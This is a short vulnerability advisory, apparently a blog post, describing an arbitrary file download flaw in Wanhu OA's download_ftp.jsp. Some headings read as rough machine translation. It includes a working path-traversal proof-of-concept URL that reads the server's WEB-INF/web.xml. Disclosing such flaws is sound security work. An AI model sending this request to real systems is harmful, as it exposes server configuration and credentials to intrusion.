Wanhu Oa Download_ftp Jsp Any File Download Vulnerability
Wanhu Oa Download_ftp Jsp Any File Download Vulnerability
Wanhu OA download_ftp.jsp any file download vulnerability
Vulnerability Description
There is a vulnerability to download any file on Wanhu OA download_ftp.jsp file. The attacker can download any file on the server through the vulnerability.
Vulnerability Impact
Ten thousand households OA
Network surveying and mapping
Vulnerability reappears
Product Page
Verify POC
1
/defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml
This post is licensed under CC BY 4.0 by the author.